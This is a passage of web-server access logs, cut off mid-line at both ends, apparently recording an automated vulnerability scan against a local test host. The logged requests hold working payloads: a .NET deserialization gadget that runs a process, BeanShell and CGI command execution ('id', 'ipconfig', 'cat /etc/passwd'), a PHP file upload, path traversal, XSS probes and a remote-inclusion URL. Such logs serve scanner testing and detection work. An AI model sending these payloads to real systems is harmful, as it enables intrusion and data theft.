like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:25 +0000","request_body":"cmd=put&target={{hash}}&content=%3c%3fphp%20echo%20%22297MdsDeZ8Esgr9Cy8vsMCJV6Dv%22%3b%20%3f%3e","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /admin/index.php?p=ajax-ops&op=elfinder HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"1.201","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2117.157 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:25 +0000","request_body":"stagingTaskData=%3cSOAP-ENV%3aEnvelope%20xmlns%3axsi%3d%22http%3a//www.w3.org/2001/XMLSchema-instance%22%20xmlns%3axsd%3d%22http%3a//www.w3.org/2001/XMLSchema%22%20xmlns%3aSOAP-ENC%3d%22http%3a//schemas.xmlsoap.org/soap/encoding/%22%20xmlns%3aSOAP-ENV%3d%22http%3a//schemas.xmlsoap.org/soap/envelope/%22%20xmlns%3aclr%3d%22http%3a//schemas.microsoft.com/soap/encoding/clr/1.0%22%20SOAP-ENV%3aencodingStyle%3d%22http%3a//schemas.xmlsoap.org/soap/encoding/%22%3e%0a%20%20%3cSOAP-ENV%3aBody%3e%0a%20%20%20%20%3ca1%3aWindowsIdentity%20id%3d%22ref-1%22%20xmlns%3aa1%3d%22http%3a//schemas.microsoft.com/clr/nsassem/System.Security.Principal/mscorlib%2c%20Version%3d4.0.0.0%2c%20Culture%3dneutral%2c%20PublicKeyToken%3db77a5c561934e089%22%3e%0a%20%20%20%20%20%20%3cSystem.Security.ClaimsIdentity.actor%20id%3d%22ref-2%22%20xmlns%3d%22%22%20xsi%3atype%3d%22xsd%3astring%22%3eAAEAAAD/////AQAAAAAAAAAMAgAAAElTeXN0ZW0sIFZlcnNpb249NC4wLjAuMCwgQ3VsdHVyZT1uZXV0cmFsLCBQdWJsaWNLZXlUb2tlbj1iNzdhNWM1NjE5MzRlMDg5BQEAAACEAVN5c3RlbS5Db2xsZWN0aW9ucy5HZW5lcmljLlNvcnRlZFNldGAxW1tTeXN0ZW0uU3RyaW5nLCBtc2NvcmxpYiwgVmVyc2lvbj00LjAuMC4wLCBDdWx0dXJlPW5ldXRyYWwsIFB1YmxpY0tleVRva2VuPWI3N2E1YzU2MTkzNGUwODldXQQAAAAFQ291bnQIQ29tcGFyZXIHVmVyc2lvbgVJdGVtcwADAAYIjQFTeXN0ZW0uQ29sbGVjdGlvbnMuR2VuZXJpYy5Db21wYXJpc29uQ29tcGFyZXJgMVtbU3lzdGVtLlN0cmluZywgbXNjb3JsaWIsIFZlcnNpb249NC4wLjAuMCwgQ3VsdHVyZT1uZXV0cmFsLCBQdWJsaWNLZXlUb2tlbj1iNzdhNWM1NjE5MzRlMDg5XV0IAgAAAAIAAAAJAwAAAAIAAAAJBAAAAAQDAAAAjQFTeXN0ZW0uQ29sbGVjdGlvbnMuR2VuZXJpYy5Db21wYXJpc29uQ29tcGFyZXJgMVtbU3lzdGVtLlN0cmluZywgbXNjb3JsaWIsIFZlcnNpb249NC4wLjAuMCwgQ3VsdHVyZT1uZXV0cmFsLCBQdWJsaWNLZXlUb2tlbj1iNzdhNWM1NjE5MzRlMDg5XV0BAAAAC19jb21wYXJpc29uAyJTeXN0ZW0uRGVsZWdhdGVTZXJpYWxpemF0aW9uSG9sZGVyCQUAAAARBAAAAAIAAAAGBgAAALoXL2MgZWNobyBUVnFRQUFNQUFBQUVBQUFBLy84QUFMZ0FBQUFBQUFBQVFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQTZBQUFBQTRmdWc0QXRBbk5JYmdCVE0waFZHaHBjeUJ3Y205bmNtRnRJR05oYm01dmRDQmlaU0J5ZFc0Z2FXNGdSRTlUSUcxdlpHVXVEUTBLSkFBQUFBQUFBQUNUT1BEVzExbWVoZGRabm9YWFdaNkZyRVdTaGROWm5vVlVSWkNGM2xtZWhiaEdsSVhjV1o2RnVFYWFoZFJabm9YWFdaK0ZIbG1laFZSUnc0WGZXWjZGZzNxdWhmOVpub1VRWDVpRjFsbWVoVkpwWTJqWFdaNkZBQUFBQUFBQUFBQUFBQUFBQUFBQUFGQkZBQUJNQVFRQU81UnRTZ0FBQUFBQUFBQUE0QUFQQVFzQkJnQUFzQUFBQUtBQUFBQUFBQUNiaFFBQUFCQUFBQURBQUFBQUFFQUFBQkFBQUFBUUFBQUVBQUFBQUFBQUFBUUFBQUFBQUFBQUFHQUJBQUFRQUFBQUFBQUFBZ0FBQUFBQUVBQUFFQUFBQUFBUUFBQVFBQUFBQUFBQUVBQUFBQUFBQUFBQUFBQUFiTWNBQUhnQUFBQUFVQUVBeUFjQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQU9EQkFBQWNBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBREFBQURnQVFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBTG5SbGVIUUFBQUJtcVFBQUFCQUFBQUN3QUFBQUVBQUFBQUFBQUFBQUFBQUFBQUFBSUFBQVlDNXlaR0YwWVFBQTVnOEFBQURBQUFBQUVBQUFBTUFBQUFBQUFBQUFBQUFBQUFBQUFFQUFBRUF1WkdGMFlRQUFBRnh3QUFBQTBBQUFBRUFBQUFEUUFBQUFBQUFBQUFBQUFBQUFBQUJBQUFEQUxuSnpjbU1BQUFESUJ3QUFBRkFCQUFBUUFBQUFFQUVBQUFBQUFBQUFBQUFBQUFBQVFBQUFRQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUE%2bPiVURU1QJVxock9YVy5iNjQGBwAAAANjbWQEBQAAACJTeXN0ZW0uRGVsZWdhdGVTZXJpYWxpemF0aW9uSG9sZGVyAwAAAAhEZWxlZ2F0ZQdtZXRob2QwB21ldGhvZDEDAwMwU3lzdGVtLkRlbGVnYXRlU2VyaWFsaXphdGlvbkhvbGRlcitEZWxlZ2F0ZUVudHJ5L1N5c3RlbS5SZWZsZWN0aW9uLk1lbWJlckluZm9TZXJpYWxpemF0aW9uSG9sZGVyL1N5c3RlbS5SZWZsZWN0aW9uLk1lbWJlckluZm9TZXJpYWxpemF0aW9uSG9sZGVyCQgAAAAJCQAAAAkKAAAABAgAAAAwU3lzdGVtLkRlbGVnYXRlU2VyaWFsaXphdGlvbkhvbGRlcitEZWxlZ2F0ZUVudHJ5BwAAAAR0eXBlCGFzc2VtYmx5BnRhcmdldBJ0YXJnZXRUeXBlQXNzZW1ibHkOdGFyZ2V0VHlwZU5hbWUKbWV0aG9kTmFtZQ1kZWxlZ2F0ZUVudHJ5AQECAQEBAzBTeXN0ZW0uRGVsZWdhdGVTZXJpYWxpemF0aW9uSG9sZGVyK0RlbGVnYXRlRW50cnkGCwAAALACU3lzdGVtLkZ1bmNgM1tbU3lzdGVtLlN0cmluZywgbXNjb3JsaWIsIFZlcnNpb249NC4wLjAuMCwgQ3VsdHVyZT1uZXV0cmFsLCBQdWJsaWNLZXlUb2tlbj1iNzdhNWM1NjE5MzRlMDg5XSxbU3lzdGVtLlN0cmluZywgbXNjb3JsaWIsIFZlcnNpb249NC4wLjAuMCwgQ3VsdHVyZT1uZXV0cmFsLCBQdWJsaWNLZXlUb2tlbj1iNzdhNWM1NjE5MzRlMDg5XSxbU3lzdGVtLkRpYWdub3N0aWNzLlByb2Nlc3MsIFN5c3RlbSwgVmVyc2lvbj00LjAuMC4wLCBDdWx0dXJlPW5ldXRyYWwsIFB1YmxpY0tleVRva2VuPWI3N2E1YzU2MTkzNGUwODldXQYMAAAAS21zY29ybGliLCBWZXJzaW9uPTQuMC4wLjAsIEN1bHR1cmU9bmV1dHJhbCwgUHVibGljS2V5VG9rZW49Yjc3YTVjNTYxOTM0ZTA4OQoGDQAAAElTeXN0ZW0sIFZlcnNpb249NC4wLjAuMCwgQ3VsdHVyZT1uZXV0cmFsLCBQdWJsaWNLZXlUb2tlbj1iNzdhNWM1NjE5MzRlMDg5Bg4AAAAaU3lzdGVtLkRpYWdub3N0aWNzLlByb2Nlc3MGDwAAAAVTdGFydAkQAAAABAkAAAAvU3lzdGVtLlJlZmxlY3Rpb24uTWVtYmVySW5mb1NlcmlhbGl6YXRpb25Ib2xkZXIHAAAABE5hbWUMQXNzZW1ibHlOYW1lCUNsYXNzTmFtZQlTaWduYXR1cmUKU2lnbmF0dXJlMgpNZW1iZXJUeXBlEEdlbmVyaWNBcmd1bWVudHMBAQEBAQADCA1TeXN0ZW0uVHlwZVtdCQ8AAAAJDQAAAAkOAAAABhQAAAA%2bU3lzdGVtLkRpYWdub3N0aWNzLlByb2Nlc3MgU3RhcnQoU3lzdGVtLlN0cmluZywgU3lzdGVtLlN0cmluZykGFQAAAD5TeXN0ZW0uRGlhZ25vc3RpY3MuUHJvY2VzcyBTdGFydChTeXN0ZW0uU3RyaW5nLCBTeXN0ZW0uU3RyaW5nKQgAAAAKAQoAAAAJAAAABhYAAAAHQ29tcGFyZQkMAAAABhgAAAANU3lzdGVtLlN0cmluZwYZAAAAK0ludDMyIENvbXBhcmUoU3lzdGVtLlN0cmluZywgU3lzdGVtLlN0cmluZykGGgAAADJTeXN0ZW0uSW50MzIgQ29tcGFyZShTeXN0ZW0uU3RyaW5nLCBTeXN0ZW0uU3RyaW5nKQgAAAAKARAAAAAIAAAABhsAAABxU3lzdGVtLkNvbXBhcmlzb25gMVtbU3lzdGVtLlN0cmluZywgbXNjb3JsaWIsIFZlcnNpb249NC4wLjAuMCwgQ3VsdHVyZT1uZXV0cmFsLCBQdWJsaWNLZXlUb2tlbj1iNzdhNWM1NjE5MzRlMDg5XV0JDAAAAAoJDAAAAAkYAAAACRYAAAAKCw%3d%3d%3c/System.Security.ClaimsIdentity.actor%3e%0a%20%20%20%20%3c/a1%3aWindowsIdentity%3e%0a%20%20%3c/SOAP-ENV%3aBody%3e%0a%3c/SOAP-ENV%3aEnvelope%3e","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /CMSPages/Staging/SyncServer.asmx/ProcessSynchronizationTaskData HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.47 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:25 +0000","request_body":"bsh.script=exec(\x22id\x22);","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /servlet/~ic/bsh.servlet.BshServlet HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:25 +0000","request_body":"amty_hidden=1","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /wp-content/plugins/amty-thumb-recent-post/amtyThumbPostsAdminPg.php?%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E=1 HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"1.200","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.124 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:25 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /product-downloads/297MdodO5jslgfW7VILe2gwfb5L.php HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1944.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:25 +0000","request_body":"bsh.script=exec(\x22ipconfig\x22);","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /servlet/~ic/bsh.servlet.BshServlet HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.025","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2919.83 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:25 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /var/resource_config.json HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.027","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:25 +0000","request_body":"{\x22Type\x22:\x22SubscriptionConfirmation\x22,\x22Message\x22:\x22\x22,\x22SubscribeURL\x22:\x22https://rfi.nessus.org/rfi.txt\x22}","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"PUT /wp-content/plugins/w3-total-cache/pub/sns.php HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"PUT", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:25 +0000","request_body":"{\x22O_\x22: \x22A\x22, \x22F_\x22: \x22EXEC_CMD\x22, \x22S_\x22: 123456789, \x22P1_\x22: {\x22Q\x22: \x22cat /etc/passwd\x22, \x22F\x22: \x22EXEC_CMD\x22}, \x22V_\x22: 1}","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /cgi-bin/libagent.cgi?type=J HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML like Gecko) Chrome/44.0.2403.155 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:25 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /jolokia/read%3Csvg%20onload=alert%28document.domain%29%3E?mimeType=text/html HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.029","http_user_agent":"Mozilla/5.0 (X11; OpenBSD i386) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:25 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /irj/go/km/navigation/ HTTP/1.1","status":"499","body_bytes_sents":"0","req_time":"5.001","http_user_agent":"Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML like Gecko) Chrome/44.0.2403.155 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:25 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /plugin HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:25 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /global-protect/login.esp?user=j%22;-alert(1)-%22x HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:25 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /Gruntfile.js HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"1.199","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.3319.102 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:25 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-content/plugins/hero-maps-pro/views/dashboard/index.php?v=%22%3E%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:25 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /jsp/index.jsp HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:25 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /Gruntfile.coffee HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:25 +0000","request_body":"action=health-check-view-file-diff&file=../../../../../../etc/passwd","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /wp-admin/admin-ajax.php?action=wprss_fetch_items_row_action HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:25 +0000","request_body":"{\x22O_\x22: \x22A\x22, \x22F_\x22: \x22EXEC_CMD\x22, \x22S_\x22: 123456789, \x22P1_\x22: {\x22Q\x22: \x22cat /etc/passwd\x22, \x22F\x22: \x22EXEC_CMD\x22}, \x22V_\x22: 1}","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /cgi-bin/libagent.cgi?type=J HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.020","http_user_agent":"Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:25 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /fiori HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.020","http_user_agent":"Mozilla/5.0 (Windows NT 4.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:25 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-content/plugins/church-admin/includes/validate.php?id=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2226.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:25 +0000","request_body":"{\x22query\x22:\x22query IntrospectionQuery{__schema {queryType { name }}}\x22}","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /v3/graphiql/finland HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"1.206","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2309.372 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:26 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /127.0.db HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"1.204","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux i686 on x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2820.59 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:26 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /?noptin_ns=email_click&to=https://example.com HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:26 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-app.log HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.027","http_user_agent":"Mozilla/5.0 (X11; OpenBSD i386) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:26 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /irj/portal/fiori HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.029","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:26 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /favicon.ico HTTP/1.1","status":"200","body_bytes_sents":"4286","req_time":"1.201","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:26 +0000","request_body":"{\x22query\x22:\x22query IntrospectionQuery{__schema {queryType { name }}}\x22}","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /v3/graphql HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.034","http_user_agent":"Mozilla/5.0 (Windows NT 6.4; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:26 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /127.0.sqlite 